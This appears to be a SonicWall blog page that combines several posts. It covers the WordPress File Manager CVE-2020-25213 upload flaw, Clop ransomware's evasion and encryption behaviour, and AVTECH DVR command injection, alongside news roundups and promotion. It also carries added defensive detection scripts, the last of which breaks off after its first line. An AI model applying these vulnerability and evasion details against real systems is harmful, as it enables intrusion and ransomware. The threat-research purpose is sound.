CVE-2020–25213: WordPress plugin wp-file-manager actively being exploited in the wild

WordPress is a free and open-source content management system written in PHP. WordPress is used by more than 60 million websites. 38% of the web is built on WordPress. Its plugin architecture allows users to extend the features and functionality to tailor the websites to their specific needs.

Vulnerability | CVE-2020-25213:

An improper access control vulnerability has been reported in the File Manager plugin for WordPress. The vulnerability is due to improper access control of connector.minimal.php file while uploading files. An unauthenticated remote attacker can exploit this vulnerability by uploading a file on the target system. A successful attack could result in code execution in the security context of the target WordPress server.

The vulnerable program is connector.minimal.php in wp-content/plugins/wp-file-manager/lib/php/. The vulnerability exists because connector.minimal.php can be accessed by an unauthenticated attacker. connector.minimal.php loads elFinderConnector.class.php, which reads HTTP request parameters and carries out File Manager features such as file upload. connector.minimal.php does not implement any authorization mechanism, such as checking the privileges of the user making the request. As a result, an unauthenticated attacker can upload arbitrary files to the server, such as a malicious PHP file, potentially leading to the execution of arbitrary code.

Exploit:

In the above exploit request, the PHP file “test_php_info.php” can be replaced with any arbitrary file the attacker wants to upload to the server. Besides the “upload” command, the “mkfile” and “put” commands available in elFinder could be used to write a PHP file into the file directory and later achieve arbitrary remote code execution.

Trend Chart:

Patch:
The below products are affected by this vulnerability.
• File Manager Pro File Manager Plugin for WordPress 6.0 to 6.8
• File Manager Pro File Manager Pro Plugin for WordPress 7.6 to 7.8

The File Manager plugin patched the issue by removing the “lib/php/connector.minimal.php” file from the plugin. Manually removing this file should also prevent attackers from exploiting this vulnerability.

Refer to the vendor advisory here.

SonicWall Capture Labs Threat Research team provides protection against this exploit with the following signatures:

IPS: 15205 WordPress wp-file-manager Plugin Remote Code Execution
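Added here as a defender-side check, not code from the page or the plugin: this Python snippet flags access-log requests to the unauthenticated connector (rating the upload/mkfile/put write commands the text names as high) and confirms whether the file the patch removed is still on disk. It assumes a combined-format access log and a WordPress root path; the sample log lines are constructed.

```python
import os
import re
from urllib.parse import parse_qs, urlparse

# Path of the connector the advisory names; if it still exists the plugin
# has not been patched (the vendor fix removed the file entirely).
CONNECTOR_PATH = "wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

# elFinder commands the text names as able to write a file to disk.
WRITE_COMMANDS = {"upload", "mkfile", "put"}

# Combined/common log format: client - - [time] "METHOD target HTTP/x" status size ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def connector_present(wp_root):
    """Return the connector's full path if it is still on disk, else None."""
    candidate = os.path.join(wp_root, *CONNECTOR_PATH.split("/"))
    return candidate if os.path.isfile(candidate) else None


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlparse(rec["target"])
    rec["path"] = url.path
    rec["query"] = {k: v[0] for k, v in parse_qs(url.query).items()}
    return rec


def flag_connector_requests(lines):
    """Return one finding per request to connector.minimal.php.

    A write command (upload/mkfile/put) in the query string is rated 'high'.
    A POST with no cmd in the query string is also 'high', because the upload
    request is a POST whose command travels in the body, which access logs do
    not record. Any other request to the file is 'medium': the page states no
    request to this connector requires authentication.
    """
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith("/" + CONNECTOR_PATH):
            continue
        cmd = rec["query"].get("cmd")
        if cmd in WRITE_COMMANDS or (rec["method"] == "POST" and cmd is None):
            severity = "high"
        else:
            severity = "medium"
        findings.append({
            "client": rec["client"],
            "time": rec["time"],
            "method": rec["method"],
            "cmd": cmd,
            "status": rec["status"],
            "severity": severity,
        })
    return findings


# Constructed sample log lines (documentation IP ranges, not real clients).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Sep/2020:10:00:01 +0000] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [01/Sep/2020:10:00:02 +0000] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=mkfile HTTP/1.1" 200 210 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Sep/2020:10:00:03 +0000] "GET /wp-login.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [01/Sep/2020:10:00:04 +0000] "GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php?cmd=open HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in flag_connector_requests(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['client']:15} {f['method']} cmd={f['cmd']} status={f['status']}")
    print("connector on disk:", connector_present("/var/www/html"))  # assumed WP root
```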

Indicators of compromise:

PC Magazine Readers: SonicWall VPN Ranks High in Overall Satisfaction, Reliability, Performance

The dramatic increase in remote and mobile workforces has made employees much more savvy when it comes to their virtual private network (VPN). With more people working from home than ever before, it’s imperative that private networks are as safe as those at their offices via secure mobile access and remote access solutions.

Luckily, business VPN clients are provided by IT departments to ensure that an organization’s data and intellectual property are safe and secure from inquisitive co-workers or cybercriminals looking for a target.

“After the start of the COVID-19 pandemic, remote workforce became the norm and corporate networks became more vulnerable as adversaries found new ways to exploit the situation,” said SonicWall VP of Products Jayant Thakre. “IT departments of enterprises, governments organizations, and SMBs quickly realized that they needed to secure remote access for both managed and unmanaged devices with the best-of-breed solutions to reduce the attack surface and protect themselves.”

In a recent PC Magazine survey invitation to its PCMag.com community members, respondents were asked to rate products and services they are currently using to address security and connectivity issues brought upon IT departments by the COVID-19 pandemic.

When compared to seven other vendors, SonicWall earned high ratings in categories such as ‘overall satisfaction,’ ‘reliability’ and ‘performance.’ Placing second to this year’s overall winner, SonicWall’s Net Promoter® Score (NPS) was above the group average, a score determined by averaging the ‘Likelihood to Recommend (on a scale of -100 to +100)’ responses.

SonicWall’s flagship VPN solution, Secure Mobile Access (SMA) enables organizations to provide anytime, anywhere and any device access to any application. SMA’s granular access control policy engine, context-aware device authorization, application-level VPN and advanced authentication with single sign-on enable organizations to move to the cloud with ease, and embrace BYOD and mobility in a hybrid IT environment.

For more details on SonicWall VPN rankings, ratings and reviews in PC Mag, please visit: https://www.pcmag.com/news/business-choice-awards-2020-vpn-services-for-work-remote-access.

Cybersecurity News & Trends – 10-30-20

This week, Ryuk is on the rise, medical records are on display, and Maze is on its way out.


SonicWall in the News

Amid Pandemic, Hospitals Warned of ‘Credible’ and ‘Imminent’ Cyberthreat — ABC News

  • SonicWall’s Q3 threat data detailing the increase of Ryuk ransomware is cited in this article, which centers around FBI’s warning of potential attacks against healthcare providers.

Review: The SonicWall SWS12-10FPOE Switch Simplifies Security — BizTech

  • This article reviews the SWS12-10FPOE Switch and mentions the benefit the product will have on small businesses and branch offices.

FBI Warns of Imminent Wave of Ransomware Attacks Hitting Hospitals — CNET

  • SonicWall’s Q3 Threat Data on the surge of ransomware is included in CNET’s article covering potential attacks on the healthcare industry.

Ryuk Wakes From Hibernation; FBI, DHS Warn of Healthcare Attacks —  Cybersecurity Dive

  • Samantha Schwartz included SonicWall’s Q3 Threat data and a quote from CEO Bill Conner in an article on possible upcoming attacks on the healthcare industry.

Venomous Bear and Charming Kitten Are Mentioned In Dispatches. Ryuk Targets Hospitals. Maze Shutdown? — CyberWire

  • CyberWire included a link to SonicWall’s Q3 Threat data press release in the “Cyber Trends” section of its daily newsletter.

Malware Levels Drop Attacks Become More Targeted — BetaNews

  • BetaNews’ article cites SonicWall’s Q3 Threat data, highlighting the drop in malware and the rise in ransomware and IoT malware attacks so far in 2020.

Ryuk Ransomware Responsible for One Third of All Ransomware Attacks in 2020 — Security Magazine

  • Security Magazine reports on SonicWall’s Q3 Threat Data, highlighting the surge in Ryuk ransomware that’s occurred in 2020.

Industry News

Maze ransomware is shutting down its cybercrime operation — Bleeping Computer

  • The Maze cybercrime gang is shutting down its operations after becoming one of the most prominent ransomware groups.

Trump Campaign Website Is Defaced by Hackers — The New York Times

  • The defacement lasted less than 30 minutes, and the hackers appeared to be looking to generate cryptocurrency.

Microsoft says Iranian hackers targeted conference attendees — The Washington Times

  • Iranian hackers reportedly posed as conference organizers in an attempt to break into the email accounts of “high-profile” people.

EXCLUSIVE: Medical Records of 3.5 Million U.S. Patients Can be Accessed and Manipulated by Anyone — Security Week

  • The results of 13 million medical examinations relating to around 3.5 million U.S. patients are unprotected and available to anyone on the internet, SecurityWeek has learned.

Spy agency ducks questions about ‘back doors’ in tech products — Reuters

  • The U.S. National Security Agency is rebuffing efforts by a leading congressional critic to determine whether it is continuing to place so-called back doors into commercial technology products, a controversial practice that critics say damages both U.S. industry and national security.

FBI: Hackers stole government source code via SonarQube instances — Bleeping Computer

  • The FBI issued a flash alert warning of hackers stealing data from U.S. government agencies and enterprise organizations via insecure and internet-exposed SonarQube instances.

Election Officials Warn of Widespread Suspicious Email Campaign — The Wall Street Journal

  • Local election officials in the U.S. have been receiving suspicious emails that appear to be part of a widespread and potentially malicious campaign targeting several states.

Bitcoin Approaches Highest Level Since Post-Bubble Crash in 2018 — Bloomberg

  • Bitcoin is approaching levels not seen in nearly three years.

US Treasury Sanctions Russian Institution Linked to Triton Malware — Dark Reading

  • Triton, also known as TRISIS and HatMan, was developed to target and manipulate industrial control systems, the US Treasury reports.

REvil ransomware gang claims over $100 million profit in a year — Bleeping Computer

  • REvil ransomware developers say that they made more than $100 million in one year of extorting large businesses.

Data breach at Finnish psychotherapy center takes a darker turn with extortion attempts — Cyberscoop

  • Patients of a prominent Finnish psychotherapy practice reportedly had their information posted on the dark web after being told they could protect their data by directly paying a ransom.

In Case You Missed It

Q3 Cyber Threat Intelligence Details a September to Remember

Despite predictions from many in the political sphere, the autumn of 2020 didn’t bring an October Surprise. But it did bring plenty of September compromise, as cybercriminals ramped up their nefarious activities to an unprecedented level.

Based on SonicWall’s Q3 cyber threat intelligence data, in nearly every threat category, the numbers for September were doing one of two things: rising, or skyrocketing. Between packed hospitals, unsecure remote students and workers, and perhaps the most high-profile presidential election in the last 50 years, there have never been so many vulnerable to attack — or so many willing to profit from them.

“For most of us, 2020 has been the year where we’ve seen economies almost stop, morning commutes end and traditional offices disappear,” said SonicWall President and CEO Bill Conner. “However, the overnight emergence of remote workforces and virtual offices has given cybercriminals new and attractive vectors to exploit. These findings show their relentless pursuit to obtain what is not rightfully theirs for monetary gain, economic dominance and global recognition.”

SonicWall, which blocks an average of more than 28 million malware attacks globally each day, recorded 4.4 billion malware attacks and 199.7 million ransomware attacks globally through the first three quarters of 2020, a year-over-year decrease of 39% and increase of 40%, respectively. Here’s a closer look at what we found:

Malware down 39% overall … but trending upward

Overall in Q3 2020 malware has continued to drop, falling to 4.4 billion hits — a nearly 40% decrease from last year. The news was even better in some areas; for example, in Germany malware dropped by nearly two-thirds, and in India it fell by nearly 70%, according to SonicWall data.

It’s worth noting, however, that Q3 ended on a much-less-optimistic note. As you’d expect with such a decrease, only two months in 2020 registered an increase in malware: May and September. May’s (relatively) modest gain of 13.3 million was little more than a blip, and quickly reversed itself.

The increase in September, however, is significantly more worrying. First of all, the increase between August and September is nearly five times as large as that between April and May, and added a total of 59 million hits.

Second, since September is the last month in Q3 (and thus the last month for which we have complete data), we don’t know yet if this is an anomaly, or if this is the first sign of malware attacks beginning to rise again from what many had expected to be a slow, but permanent, decline.

Ongoing increase in Ransomware picking up steam

In the mid-year update to the SonicWall 2020 Cyber Threat Report, we noted that the total number of ransomware hits during the first half of the year was up 20% over the same time period in 2019. But with June registering a slight decrease, we hoped that this would mark the beginning of a trend, and that ransomware’s reign of terror would, if not end, at least give us a bit of breathing room during an otherwise difficult time.

In true 2020 fashion, it turns out the opposite has happened, as the 20% increase at the end of Q2 grew to a 40% increase by the end of Q3. While that’s worrying enough, the pace of this increase offers further cause for concern.

After a small increase of 12.4% from June to July (16.7 million to 18.8 million), August and September continued to pick up momentum. Between July and August, total ransomware rose from 18.8 million to 25.5 million, and then from August to September it jumped even more, from 25.5 million to 34.1 million.

Ryuk attacks account for third of year’s ransomware

Much of this increase is coming from the precipitous rise in the number of Ryuk detections. First discovered in August 2018, Ryuk is a relatively young ransomware family, and one that got off to a slow start among SonicWall customers.

Through Q3 2019, SonicWall detected just 5,277 Ryuk attacks. Through Q3 2020, SonicWall detected 67.3 million Ryuk attacks. Not only does this amount to a mind-blowing 1,275,245% increase, it also represents more than a third of all ransomware attacks so far this year.

Ryuk is especially dangerous because it’s targeted, manual and often leveraged via a multi-stage attack (Emotet > Trickbot > Ryuk.) In other words, Ryuk is like the cockroach of the malware world — if you see it, chances are the infestation goes much, much deeper than you think.

The fact that SonicWall is seeing such a large uptick implies that Ryuk may be proliferating to larger groups of criminals, increasing the chances of any one organization being hit. However, this spike could also mean that Ryuk operators have begun hunting outside their usual stomping grounds and have started attacking SMBs and schools as well.

Unfortunately, we’ve also seen an increase in attacks on hospitals — and the problem may soon get much worse. Based on “credible information of an increased and imminent cybercrime threat to U.S. hospitals,” on October 28 CISA, FBI and HHS issued a joint cybersecurity advisory warning that the Ryuk ransomware may gain entry via Trickbot, and strongly advised hospitals and other healthcare facilities to take the recommended steps to protect against being compromised.

IoT malware hits second-highest level ever

In our mid-year update to the 2020 SonicWall Cyber Threat Report, we noted that, if the patterns we were seeing at the time held, total IoT attacks for 2020 would surpass both 2018 and 2019 levels.

Now, with an entire quarter left to go, we’ve already nearly reached that point. Through Q3, SonicWall registered 32.4 million IoT malware attacks, closing in on 2019’s total of 34.4 million attacks and within a hair’s breadth of 2018’s total (32.7 million attacks).

But once again, the real story here is September. During that month, SonicWall recorded 6.8 million IoT malware attacks, up 137% from the previous month, and more than the totals for July and August put together. This number also represents an increase of 69.2% over 2020’s previous high in March, and is 68.7% higher than in September 2019.

5G and the Security of Connected Devices

In a world with watches that wirelessly beam video across the country, refrigerators that can read you the local weather report and Wi-Fi-enabled barbecue grills, it’s hard to imagine the world of connected devices becoming much more complex.

But the imminent 5G revolution is likely to bring with it devices that advance comfort, convenience, entertainment and safety in ways we never thought possible — all of which will need secure wireless controls as to not be turned against us.

During the final week of National Cybersecurity Awareness Month (NCSAM), we’re taking a closer look at the future of 5G and internet-connected devices — how they could benefit us, what sorts of dangers they could pose, and what we can do to secure them, both now and into the future.

“5G will pump $12 trillion into the global economy by 2035 and add 22 million new jobs in the United States alone”

According to the New Yorker, “5G will pump $12 trillion into the global economy by 2035 and add 22 million new jobs in the United States alone,” while ushering in “a fourth industrial revolution.”

This could be hard to imagine if you primarily view 5G as something that could someday allow you to download the entire Harry Potter film catalog faster than you can say “Accio Nostalgia!” But the true value of 5G to society is likely to come in the form of technological advancements not intended for the consumer market, such as robots making precision-machined components in a factory; surgeons using VR headsets and gloves to perform surgeries remotely; and smart cities that function as a sort of macrocosm of our current smart homes, tying together things like trash collection, parking meters and public restrooms to improve safety, sanitization and convenience.

That isn’t to say there won’t be plenty for the average consumer to enjoy, however. Truly autonomous vehicles that connect with traffic signals and other vehicles and react more quickly than human drivers are already in the works, and console-quality video games on your phone (or video games on your console with near-zero lag) are a logical next step once the anticipated reductions in latency come to pass.

Stores that allow you to try on clothing without stepping foot into a dressing room — or see what a new sofa would look like in your living room without leaving the furniture store — are a natural progression from the sort of augmented reality first brought to the mainstream by Pokémon Go.

And that’s to say nothing of your cellphone: anticipated download speeds of up to 10 Gbps will revolutionize what you can do with your phone, how quickly you can do it, and how many things you can do at once without affecting performance.

But as with other advances in digital technology, the same things that can make life easier for us can also make life immeasurably more difficult in the hands of cybercriminals. 5G will significantly increase the number of IoT devices coming online — and right now IoT security regulations are basically nonexistent.

As a result, as this increasing attack surface continues to draw more cybercriminals, we’re likely to see skyrocketing rates of IoT malware. The addition of more devices and more bandwidth doesn’t just give cybercriminals more to target directly — it could also bring about DDoS attacks far more debilitating and widespread than the ones we see today. Wireless security will be a must.

To stop the influx of attacks will require the cooperation of all stakeholders. Minimum cybersecurity requirements for manufacturers of IoT devices would go a long way toward preventing attacks, as would the establishment of a rating system (similar to the ones that currently measure usage cost on water heaters) to inform customers how safe a particular device is compared to others.

There are also things users can do to stay safe — many of which are best practices now, but will become crucial as 5G technology is fully adopted:

  • Install malware protection on your devices, if it isn’t there already
  • Ensure that none of your devices, particularly IoT devices, are still using the factory default password
  • Always make sure that your devices are patched and running the latest OS version
  • Keep up with the latest developments in cybercrime — just because you’re adequately secured now doesn’t mean you will be in the future
  • Only purchase internet-connected devices from companies who have made securing these devices a top priority.

As Champions of National Cyber Security Awareness Month, SonicWall is committed to helping organizations develop strategies for anywhere, anytime, any device security — not just during October, but all year long. For more cybersecurity news and tips, follow us on social media and check out our blog.

A new variant of Clop Ransomware surfaces

The SonicWall Capture Labs threat research team observed reports of a new variant family of Clop ransomware (Detected as Clop.RSM) actively spreading in the wild.

The Clop ransomware encrypts the victim’s files with a strong encryption algorithm until the victim pays a fee to get them back.

Infection Cycle

The ransomware adds the following files to the system:

  • Malware.exe
  • %CurrentFolder%\HotGIrls (ZeroKb)
  • %CurrentFolder%\Clearnetworkdns_11-22-33.bat

To defeat emulators and avoid executing the real malicious code inside time-bound sandboxes, it calls Kernel32.dll APIs with invalid parameters in a loop that repeats 666000 times.

After the loop completes, it starts enumerating running processes.

The malware checks for the presence of the following processes belonging to security vendors:

  • SBAMSvc.exe (GFI AntiMalware antivirus product)
  • VipreAAPSvc.exe (Vipre antivirus product)
  • SBAMTray.exe (Vipre antivirus product)
  • SBPIMSvc.exe (Sunbelt AntiMalware antivirus product)
  • WRSA.exe (WebRoot antivirus product)

If any of these processes is found, it delays execution by 10 seconds by calling the Sleep() API twice with 5 seconds as the parameter.

It creates a mutex named “^_-HappyLife^_-” and checks whether it already existed by calling WaitForSingleObject and comparing the result with 0. A non-zero result means another instance is already running, in which case it exits.

It then follows the normal execution path (the path taken when none of the security vendor processes listed above is present).

It drops a batch file in the folder from which the sample is executed and runs it using the ShellExecute API.

It then creates two threads: one uses MPR.DLL to enumerate network resources and encrypt files found on network drives; the other enumerates running processes:

It walks directories and subdirectories using the FindFirstFile and FindNextFile APIs, calculates a unique hash of each file or folder path and compares it with hardcoded hash values. If the hash matches, the folder or file is not encrypted:

In the second thread it enumerates processes and converts each process name to upper case:

A unique hash value is then calculated using the same logic as for the file and folder names.
That value is compared with hardcoded hash values, and any process whose hash matches is terminated.

It encrypts the bytes of each file with a randomly generated AES key and, after encryption, appends the marker “Clop^_” at the end of the file. After the marker it stores the key used to encrypt that file, itself encrypted with the master RSA key hardcoded in the malware.

The .Clop extension is appended to the encrypted files.

And in each folder it drops the ClopReadMe.txt containing ransom note.
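As an added incident-response triage aid (not code from the page or from the Clop sample), this Python parses the file trailer described above: it splits a `.Clop` file at the “Clop^_” marker, extracts the RSA-ciphered per-file key that follows it, and classifies a set of files as encrypted, ransom note, marker-only or clean. It assumes the ciphered key runs from the marker to end-of-file (the page does not state its length); the sample file contents are constructed.

```python
import os

CLOP_MARK = b"Clop^_"           # marker written after the encrypted data
CLOP_EXT = ".Clop"              # extension appended to encrypted files
RANSOM_NOTE = "ClopReadMe.txt"  # note dropped in every folder


def parse_clop_trailer(data):
    """Split an encrypted file into (encrypted_body, ciphered_key).

    Returns None when the marker is absent. Assumption (not stated on the
    page): the RSA-ciphered AES key occupies everything after the marker, so
    an empty key blob means the file was truncated or only partially written.
    """
    pos = data.rfind(CLOP_MARK)
    if pos < 0:
        return None
    return data[:pos], data[pos + len(CLOP_MARK):]


def classify_file(name, data):
    """Classify one file as 'encrypted', 'note', 'marker-only' or 'clean'.

    'marker-only' catches files carrying the trailer without the extension,
    which a rename or an interrupted run could leave behind.
    """
    if os.path.basename(name) == RANSOM_NOTE:
        return "note"
    if parse_clop_trailer(data) is None:
        return "clean"
    return "encrypted" if name.endswith(CLOP_EXT) else "marker-only"


def triage(files):
    """files: dict of name -> bytes. Returns a summary usable in an IR report.

    Each file carries its own randomly generated AES key, so on an intact set
    'distinct_key_blobs' should equal the number of non-truncated encrypted
    files; a lower count would be worth a closer look.
    """
    summary = {"encrypted": [], "note": [], "marker-only": [], "clean": [],
               "truncated": []}
    key_blobs = set()
    for name, data in files.items():
        kind = classify_file(name, data)
        summary[kind].append(name)
        if kind == "encrypted":
            _, key_blob = parse_clop_trailer(data)
            if key_blob:
                key_blobs.add(key_blob)
            else:
                summary["truncated"].append(name)
    summary["distinct_key_blobs"] = len(key_blobs)
    return summary


def triage_directory(root):
    """Read every file under root and run triage() on it."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            path = os.path.join(dirpath, n)
            with open(path, "rb") as fh:
                files[os.path.relpath(path, root)] = fh.read()
    return triage(files)


# Constructed sample files standing in for an affected folder.
SAMPLE_FILES = {
    "report.docx.Clop": b"\x8a\x11\x42\x9c" + CLOP_MARK + b"RSA-CIPHERED-KEY-A",
    "photo.jpg.Clop":   b"\x00\xff\x13\x37" + CLOP_MARK + b"RSA-CIPHERED-KEY-B",
    "partial.bin.Clop": b"\x55\xaa" + CLOP_MARK,   # trailer written, key missing
    "ClopReadMe.txt":   b"<constructed ransom note text>",
    "notes.txt":        b"plain text, untouched",
}

if __name__ == "__main__":
    for key, value in triage(SAMPLE_FILES).items():
        print(f"{key}: {value}")
```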


SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Clop.RSM (Trojan)

Cybersecurity News & Trends – 10-23-20

While election security is still making headlines, education news moved to the forefront this week as K-12 institutions continue fighting off a barrage of cyberattacks.


SonicWall in the News

Hackney Council Cyberattack: Why Are Hackers Targeting The Public Sector? — IT Supply Chain

  • Terry Greer-King, VP of EMEA at SonicWall, offers some perspective on the Hackney Council cyberattack — and a warning to other public bodies.

National Cybersecurity Awareness Month – Empower Organizations in Cybersecurity Protocols — Business 2 Community

  • Companies should be doing more to defend against cyberattacks, and during Cybersecurity Awareness Month, cybersecurity professionals are committed to telling you how.

Ripple20 Isn’t An Anomaly – IoT Security is a Mess (Still) — Infosecurity Magazine

  • A new SonicWall report found a 50% increase in IoT malware attacks in the first half of 2020 alone — a number that’s sure to rise further as the number of IoT devices coming online continues to rise.

Industry News

UK’s GCHQ spy chief: We must engage business to harness cyber talent for future — Reuters

  • The head of Britain’s GCHQ agency said on Wednesday it was seeking to engage more with business to harness top cyber talent.

Botnet Fights Back After Microsoft’s Election Security Takedown — Bloomberg

  • After Microsoft led a global attack against a highly prolific malware group, the company says it’s winning the battle to destabilize the malicious botnet ahead of the U.S. presidential election.

LockBit ransomware moves quietly on the network, strikes fast — Bleeping Computer

  • LockBit ransomware takes as little as five minutes to deploy the encryption routine on target systems once it lands on the victim network.

Mysterious ‘Robin Hood’ hackers donating stolen money — BBC

  • Darkside hackers claim to have extorted millions of dollars from companies, but say they now want to “make the world a better place.” In a post on the Dark Web, the gang posted receipts for $10,000 in Bitcoin donations to two charities.

U.S. Accuses Google of Illegally Protecting Monopoly — The New York Times

  • A victory for the government could remake one of America’s most recognizable companies and the internet economy that it has helped define.

Hackers Smell Blood as Schools Grapple With Virtual Instruction — The Wall Street Journal

  • Many K-12 schools opting for virtual instruction distributed devices to students and teachers. Now, as this unique school year unfolds, hackers are circling.

TrickBot malware under siege from all sides, and it’s working — Bleeping Computer

  • The Trickbot malware operation is on the brink of going down completely following efforts from an alliance of cybersecurity and hosting providers targeting the botnet’s command-and-control servers.

Democrats introduce bill providing $400 million to protect schools from cyberattacks — The Hill

  • The Enhancing K-12 Cybersecurity Act would establish a $400 million “K-12 Cybersecurity Human Capacity” grant program to help protect educational institutions against attacks.

Hackers now abuse BaseCamp for free malware hosting — Bleeping Computer

  • Phishing campaigns have started using Basecamp as part of malicious phishing campaigns that distribute malware or steal login credentials.

Fancy Bear Imposters Are on a Hacking Extortion Spree — Wired

  • Companies worldwide are getting extortion notices from hackers, which claim to be Fancy Bear or the Lazarus Group, warning them to pay up or face powerful DDoS attacks.

Federal watchdog finds escalating cyberattacks on schools pose potential harm to students — The Hill

  • The Government Accountability Office (GAO), a federal watchdog agency, has concluded that an increasing number of cyberattacks on educational institutions are putting students increasingly at risk.

Thousands of infected IoT devices used in for-profit anonymity service — Ars Technica

  • Some 9,000 devices — mostly Android, but also Linux and Darwin OS — have been corralled into the Interplanetary Storm, a botnet whose chief purpose is creating a for-profit proxy service.

Trump signs legislation making hacking voting systems a federal crime — The Hill

  • Trump has signed the Defending the Integrity of Voting Systems Act unanimously approved by the House last month, over a year after the Senate also unanimously passed the legislation.

In Case You Missed It

Capture Client: Purpose-Built for the Distributed Workforce

Before COVID-19 shelter-in-place orders were enacted across North America, I created several educational pieces on the subject of the distributed workforce. At that time, 70% of endpoints in the average company could be found outside the walls of the office at least once a week, and 53% of them could be away from perimeter defenses and physical accountability half of the week or more.

Now that this percentage has risen to nearly 100%, the focus at SonicWall is to give companies more visibility into what endpoints are doing, as well as more tools to keep people accountable, productive and safe online, whether or not they are coming in through VPN.

SonicWall Capture Client was designed to be a standalone security offering with optional built-in synergies with the SonicWall ecosystem. It was intended for the distributed workforce from Day One, and since then we’ve added more tools to stop attacks before they can damage systems, more freedom to add granular controls to web content, and soon, more tools for those who manage tenants.

From the solution’s first build, the goal has been to stop attacks before and as they execute, with remediation steps to quickly resolve problems if an attack ever causes damage. Since those early days, we’ve added Capture ATP sandboxing integration, Device Control to stop infected USB devices, Attack Visualization and more.

Today, Capture Client is widely relied on to keep remote employees safe from outside threats as well as from harmful web properties. By combining Security, Web Filtering and Device Control, Capture Client offers an ideal work-from-home solution:

Security

SonicWall has always been a security-first company. From our beginnings in network security, protecting endpoints from outside threats is in our corporate DNA.

Since many endpoints may not be connecting to the company infrastructure via VPN, endpoint security is usually the first and last line of defense. By leveraging the SentinelOne anti-malware engine, which combines AI with Capture ATP sandboxing integration, we are stopping most (nearly all) attacks before and as they execute. First, the AI engine constantly monitors system changes for malicious intent. Second, if the engine can’t fully convict a suspicious file, the file is sent to a Capture ATP PoP (Point of Presence) for evaluation. Since Capture ATP can do more with a file than your endpoint is allowed to do by the OS, it can flush out sleeping or seemingly innocuous threats.

This means that, if an employee downloads a malicious attachment from their private email or lands on an infected phishing site, Capture Client’s continuous monitoring technology will stop the attack and inform the end user of the event. If an employee downloads a file designed to activate and connect with a C&C server at a designated time in the future, Capture ATP will identify the threat. If remediation is required, administrators can step in and quickly get any Windows machine back to its last known clean state, no matter where the endpoint sits.

Web Filtering

Years ago, SonicWall first developed Content Filtering Service (CFS) for firewalls — and Content Filtering Client (CFC) — based on our work with school districts, where the goal was to protect the most impressionable among us from abusive content and prevent sites like YouTube from taking too much of a school’s bandwidth. CFS and CFC (which is used to enforce the policies on devices away from firewalls) were built with a lot of tools for those that needed them most — but the business community was also able to benefit from their granular control of web content as needed. These tools have now been added to Capture Client for your use; here are some use cases listed in order of commonality for business users:

Blocking malicious content

The little-known secret that I am trying to reveal is that a lot of companies have access to Content Filtering in one shape or form, but don’t use it. You don’t have to get fancy with it; you can simply use it to block millions of known malicious phishing sites, hacking domains and other malicious IP addresses (think botnets or C&C servers).

Blocking inappropriate material

Every company has an Internet usage policy to help employees avoid certain categories of web content. There are over 50 categories such as Adult/Mature Content, Drugs/Illegal Drugs, Illegal Skills, or Nudism that can be blocked.

Blocking specific social media outlets

When shelter-in-place orders forced workers to stay in their homes, the first complaints from admins I heard (outside of VPN connectivity) were about trying to keep the network open for business traffic due to too many users watching TikTok videos. Some admins will create granular policies to block TikTok, yet keep YouTube open. Policies can also be created to give marketing departments access to Facebook and Twitter, but block their use by those in other departments.

Bandwidth management

If, for example, YouTube is taking up too much bandwidth as people are pulling it through your servers via VPN, one could limit the amount of bandwidth a specific web property can use.

Device Control

In 46% of American homes, both parents are working — which means endpoints from two different companies may sit side by side most of the day. How many of these couples use the same USB devices? Capture Client has the ability to block unknown devices from connecting to the employee endpoint, preventing infection by a compromised USB device from another company’s endpoint. If malware were to jump between companies in 2020, this might be a top-three threat vector. But even if you don’t use the Device Control feature, the AI engine within Capture Client will still notice the malicious behavior and stop any malicious scripts from executing.

Conclusion

In short, Capture Client helps secure work-from-home by being a top-in-class, first and last line of defense against online attacks and infected devices, as well as enforcing your internet usage policies. If you’d like more information on how Capture Client keeps people working safely no matter where they are, you’re welcome to listen to one of my recent webcasts, “You Can’t Stop What You Can’t See.”

Attackers actively targeting vulnerable AVTECH devices

SonicWall Capture Labs threat research team observed attacks exploiting old vulnerabilities in AVTECH devices. AVTECH’s primary products are DVR and mobile surveillance systems. Its products target the IP camera market and are commonly used in intelligent surveillance systems.
Attackers are targeting the following two vulnerabilities in AVTECH’s products:

1. Unauthenticated command injection in DVR devices

The cgi_query action in Search.cgi performs HTTP requests with the wget system command, passing the received parameters into the command line without sanitization or verification. By exploiting this issue, an attacker can execute any system command with root privileges without authentication.

The following exploit requests were spotted in the wild for this vulnerability:

2. Authenticated command injection in CloudSetup.cgi

Devices that support the Avtech cloud contain CloudSetup.cgi, which can be accessed after authentication. The exefile parameter of a CloudSetup.cgi request specifies the system command to be executed. Since there is no verification or whitelist-based checking of the exefile parameter, an authenticated attacker can execute arbitrary system commands with root privileges.

The following exploit requests were spotted in the wild for this vulnerability:

Decoding the URLs and taking a closer look at them:

Both exploits connect to a malicious domain and download a shell script. The injected command chain then changes the file permissions of the downloaded script and executes it. That script in turn connects to the attacker-controlled server to download further malicious files.
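As an added example (not part of the original post and not SonicWall’s own signature logic), the following Python script applies the analysis above to a web-server access log from an AVTECH device: it URL-decodes each request (twice, to defeat double encoding), flags Search.cgi requests with action=cgi_query whose parameters carry shell metacharacters, flags any CloudSetup.cgi request carrying exefile, pulls the download host out of the injected wget/curl chain, checks it against the IP IoCs listed in this post, and records which stages of the download/chmod/execute chain are present. The log lines, CGI directory prefixes, parameter names and payloads are constructed for illustration; they are not the captured in-the-wild requests.

```python
import re
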